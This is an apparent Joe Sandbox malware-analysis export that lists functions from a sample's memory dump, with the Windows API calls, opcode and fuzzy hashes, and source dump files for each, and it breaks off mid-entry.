Opcode ID: 237c81c062eddb6cbd7188644f2e8c9651afd6fb87ec798c11773476aaab6611
Instruction ID: 975060bf96e467f4ec033767bee3fe7f25756ccaefe5b2231cbbba17db0ee70e
Opcode Fuzzy Hash: 237c81c062eddb6cbd7188644f2e8c9651afd6fb87ec798c11773476aaab6611
Instruction Fuzzy Hash: 0F419074204244AFD711DF68DC84FAB7BB8EB8A720F140229F964871F2C7719846DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00A607EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00A6080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A60847
EnterCriticalSection.KERNEL32(?), ref: 00A60863
LeaveCriticalSection.KERNEL32(?), ref: 00A608DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A608F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00A60921

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 8591778980de16d153ace6dd83bd76b5c6a19885a834339bea639685a10af06a
Instruction ID: 49ef9aa79034c02b1a58c5008b88ec8a53ee13fa4505c6395c53e265c66e3826
Opcode Fuzzy Hash: 8591778980de16d153ace6dd83bd76b5c6a19885a834339bea639685a10af06a
Instruction Fuzzy Hash: 33414A71900205EFDF14EF94ED85AAA77B9FF44310F1440A9ED00AA297D730DEA5DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A881DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A8824C
EnableWindow.USER32(00000000,00000000), ref: 00A88272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A882D1
ShowWindow.USER32(00000000,00000004), ref: 00A882E5
EnableWindow.USER32(00000000,00000001), ref: 00A8830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A8832F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 6d53bf0763319f1cd54f92f3c19eae329840640f471d2a5443a02309776744b3
Instruction ID: d1fd7bf99fa9c6d20fd9d6b7ada281b959531d6d043fb3bfb3cf7c8356170d89
Opcode Fuzzy Hash: 6d53bf0763319f1cd54f92f3c19eae329840640f471d2a5443a02309776744b3
Instruction Fuzzy Hash: 9341D574601640AFDB22EF54C899FE47BE0FB0A714F580168E5188F263DF35A842CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A54C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00A54C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A54CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A54CEA
_wcslen.LIBCMT ref: 00A54D08
CharUpperBuffW.USER32(00000000,00000000), ref: 00A54D10
_wcsstr.LIBVCRUNTIME ref: 00A54D1A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: ddd17beef6ad275ecb0e28439d38c468e1abd5f985f2280eb9adbf0db27e656e
Instruction ID: 95c2bd747200dcff8cd9aa6dfdf2b696ab6a8d7ab42181c01944a7360182e0bc
Opcode Fuzzy Hash: ddd17beef6ad275ecb0e28439d38c468e1abd5f985f2280eb9adbf0db27e656e
Instruction Fuzzy Hash: 05212932204204BBEB259B79ED09E7B7BACEF49764F108039FC05DA191EA75DC8587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A6581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 009F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F3A97,?,?,009F2E7F,?,?,?,00000000), ref: 009F3AC2

_wcslen.LIBCMT ref: 00A6587B
CoInitialize.OLE32(00000000), ref: 00A65995
CoCreateInstance.OLE32(00A8FCF8,00000000,00000001,00A8FB68,?), ref: 00A659AE
CoUninitialize.OLE32 ref: 00A659CC

Strings

.lnk, xrefs: 00A65876, 00A658C1, 00A65985

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 13d6651eb8bfc692aef7ee06cbfcefc2af6d5c685252be8964953fdf9f0e381d
Instruction ID: 0ecc18733895c4a396078650e0f02b13df13abc755d12ab5869e8a2add704730
Opcode Fuzzy Hash: 13d6651eb8bfc692aef7ee06cbfcefc2af6d5c685252be8964953fdf9f0e381d
Instruction Fuzzy Hash: F3D16071A086059FC714DF28C484A2ABBF1FF89724F14885DF88A9B361DB31EC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A5175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A50FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A50FCA
Part of subcall function 00A50FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A50FD6
Part of subcall function 00A50FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A50FE5
Part of subcall function 00A50FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A50FEC
Part of subcall function 00A50FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A51002

GetLengthSid.ADVAPI32(?,00000000,00A51335), ref: 00A517AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A517BA
HeapAlloc.KERNEL32(00000000), ref: 00A517C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 00A517DA
GetProcessHeap.KERNEL32(00000000,00000000,00A51335), ref: 00A517EE
HeapFree.KERNEL32(00000000), ref: 00A517F5

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: fc8b4f61c3c68335167b8943797fd7353af7650c841fd153c1c4ea7e29488529
Instruction ID: a61cc106d425a6329d6abc053c6304dc0a01f355e74c7e023e2bfb98febe1e58
Opcode Fuzzy Hash: fc8b4f61c3c68335167b8943797fd7353af7650c841fd153c1c4ea7e29488529
Instruction Fuzzy Hash: 88115971500205EBDB109BA8DC89FBE7BB9FB49366F104218E881A7210D735A949CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A514CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A514FF
OpenProcessToken.ADVAPI32(00000000), ref: 00A51506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A51515
CloseHandle.KERNEL32(00000004), ref: 00A51520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A5154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00A51563

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: aca7ba0ece839e14bc9cbd06d69702187b62081152df41c50a26e976cdee61fa
Instruction ID: aea6de5731bc40de2798a1540f811554db45d4f6fc11b9bf0556179fe4f369e3
Opcode Fuzzy Hash: aca7ba0ece839e14bc9cbd06d69702187b62081152df41c50a26e976cdee61fa
Instruction Fuzzy Hash: 34114772500209ABDB11CFA8ED49FEA7BB9FB48759F044124FE05A2060D3758E65EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A13382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A13379,00A12FE5), ref: 00A13390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A1339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A133B7
SetLastError.KERNEL32(00000000,?,00A13379,00A12FE5), ref: 00A13409

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 25eb76c089856fed897679b83ff605a5a93f913106fbdd6603a09dc566473858
Instruction ID: 2d7e44218a7d94a91a8cdf1cf3670ac5ca1deacd1fbe2006e2fc22351bc08627
Opcode Fuzzy Hash: 25eb76c089856fed897679b83ff605a5a93f913106fbdd6603a09dc566473858
Instruction Fuzzy Hash: 6D01B133609321BEEE257FB47D85AE72A94EB0537A720032AF420891F1EF114D835658

Uniqueness

Uniqueness Score: -1.00%

Function 00A22D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A25686,00A33CD6,?,00000000,?,00A25B6A,?,?,?,?,?,00A1E6D1,?,00AB8A48), ref: 00A22D78
_free.LIBCMT ref: 00A22DAB
_free.LIBCMT ref: 00A22DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00A1E6D1,?,00AB8A48,00000010,009F4F4A,?,?,00000000,00A33CD6), ref: 00A22DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00A1E6D1,?,00AB8A48,00000010,009F4F4A,?,?,00000000,00A33CD6), ref: 00A22DEC
_abort.LIBCMT ref: 00A22DF2

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: ebd10250eac6f71a7e29bf360e96cb187285c572235a24970a8658607473220a
Instruction ID: fff2c5440d90668a06d1a4badaa287386ed7cd0e5bd77744a355107968183bc8
Opcode Fuzzy Hash: ebd10250eac6f71a7e29bf360e96cb187285c572235a24970a8658607473220a
Instruction Fuzzy Hash: 4BF0C236544A3077D622677CBD0AF5A2669AFD27B1F250538F824A61E2EE3488035770

Uniqueness

Uniqueness Score: -1.00%

Function 00A88A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00A09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00A09693
Part of subcall function 00A09639: SelectObject.GDI32(?,00000000), ref: 00A096A2
Part of subcall function 00A09639: BeginPath.GDI32(?), ref: 00A096B9
Part of subcall function 00A09639: SelectObject.GDI32(?,00000000), ref: 00A096E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A88A4E
LineTo.GDI32(?,00000003,00000000), ref: 00A88A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A88A70
LineTo.GDI32(?,00000000,00000003), ref: 00A88A80
EndPath.GDI32(?), ref: 00A88A90
StrokePath.GDI32(?), ref: 00A88AA0

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 032aa2ce561fd5a4250f392f01103e3618273e928828c47fe40ab0e9613694fc
Instruction ID: 1bee187b74c180ef32593763893bdd2fca88e39796d6839f65d2ae815c80b548
Opcode Fuzzy Hash: 032aa2ce561fd5a4250f392f01103e3618273e928828c47fe40ab0e9613694fc
Instruction Fuzzy Hash: BE11B776000149FFDB129F94EC88EAA7F6DEB083A4F048012BA199A1A1C7719D56DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A551FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A55218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00A55229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A55230
ReleaseDC.USER32(00000000,00000000), ref: 00A55238
MulDiv.KERNEL32 ref: 00A5524F
MulDiv.KERNEL32 ref: 00A55261

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ea6fc0990a5ba69fd7bc670f669a0d4ef9bd37d62ebc6855444e59f621b1a699
Instruction ID: 665aabb60c151f51da66cad38f60ac9924f3a024707cb0800c869b0e2763536e
Opcode Fuzzy Hash: ea6fc0990a5ba69fd7bc670f669a0d4ef9bd37d62ebc6855444e59f621b1a699
Instruction Fuzzy Hash: 5E014F75E00718BBEB109BF59C49A5EBFB8FF48761F044065FA04E7281DA709905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009F1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 009F1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 009F1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 009F1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 009F1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 009F1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 009F1C22

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: e70141c5eaafbb6a26839cd2e513b650495ec859dd4a7ad756e45a3571f5266d
Instruction ID: 56c7aaa1411893fa6fa7ea3f14772ff8f4d49cd90869fd01a3f6abc1e52abff8
Opcode Fuzzy Hash: e70141c5eaafbb6a26839cd2e513b650495ec859dd4a7ad756e45a3571f5266d
Instruction Fuzzy Hash: 94016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 00A5EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00A5EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A5EB46
GetWindowThreadProcessId.USER32(?,?), ref: 00A5EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A5EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A5EB6E
CloseHandle.KERNEL32(00000000), ref: 00A5EB75

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 9ff9db9e24cf12ff45dd10bd89adb6a750a89d844e6ee588646de38336b23fbb
Instruction ID: a85f701eb67f97bf13f5bedd2732450f5371fa8f1201b7c858c28fca02347d37
Opcode Fuzzy Hash: 9ff9db9e24cf12ff45dd10bd89adb6a750a89d844e6ee588646de38336b23fbb
Instruction Fuzzy Hash: 6AF05472240158BBE72197929C4DEEF7E7CEFCAB21F004168F601D1091E7B45A02CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00A47439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00A47452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00A47469
GetWindowDC.USER32(?), ref: 00A47475
GetPixel.GDI32(00000000,?,?), ref: 00A47484
ReleaseDC.USER32(?,00000000), ref: 00A47496
GetSysColor.USER32 ref: 00A474B0

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: af8db82da2cdc70ef72a9b66b9e6c151bfd9449924b1ee6cc3885af95806f5ce
Instruction ID: 93d4d6b77742196b4135a10e23f47a9e8cdb8d9d7823dd7cb864a5bab2aab629
Opcode Fuzzy Hash: af8db82da2cdc70ef72a9b66b9e6c151bfd9449924b1ee6cc3885af95806f5ce
Instruction Fuzzy Hash: 89014631500255EFEB519FA4EC08BAE7BB6FF04322F614164F916A21A1DB311E52AF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A51874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A5187F
UnloadUserProfile.USERENV(?,?), ref: 00A5188B
CloseHandle.KERNEL32(?), ref: 00A51894
CloseHandle.KERNEL32(?), ref: 00A5189C
GetProcessHeap.KERNEL32(00000000,?), ref: 00A518A5
HeapFree.KERNEL32(00000000), ref: 00A518AC

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: a56ca8fc4fcb44c9a84f12599698e76e77658ce1051585402907db7f533035c0
Instruction ID: 96cdd032f100e2daed4877bf198256c431a7f4b6b34ee6b0a69c35ad9f6faf07
Opcode Fuzzy Hash: a56ca8fc4fcb44c9a84f12599698e76e77658ce1051585402907db7f533035c0
Instruction Fuzzy Hash: D6E0C236004101BBDA019BE1ED0CD0ABB29FB49B32B108220F22585474CB329422EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00A5C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F7620: _wcslen.LIBCMT ref: 009F7625

GetMenuItemInfoW.USER32 ref: 00A5C6EE
_wcslen.LIBCMT ref: 00A5C735
SetMenuItemInfoW.USER32 ref: 00A5C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A5C7CA

Strings

0, xrefs: 00A5C6AF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 07939dff2beaaef0abc762096258ea2c94d1c02cc6ed92f2d2a29f96f9263c10
Instruction ID: bca763cded48cf285b5a0a318e1c7216d46339e5447f50a91fd61162426ef56a
Opcode Fuzzy Hash: 07939dff2beaaef0abc762096258ea2c94d1c02cc6ed92f2d2a29f96f9263c10
Instruction Fuzzy Hash: F451BD716043019FD7149F28C885B6AB7E8BB89321F040A2DFD95E39A5DB74D948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A7AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00A7AEA3

Part of subcall function 009F7620: _wcslen.LIBCMT ref: 009F7625

GetProcessId.KERNEL32(00000000), ref: 00A7AF38
CloseHandle.KERNEL32(00000000), ref: 00A7AF67

Strings

@, xrefs: 00A7AE72
<, xrefs: 00A7AE6B

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
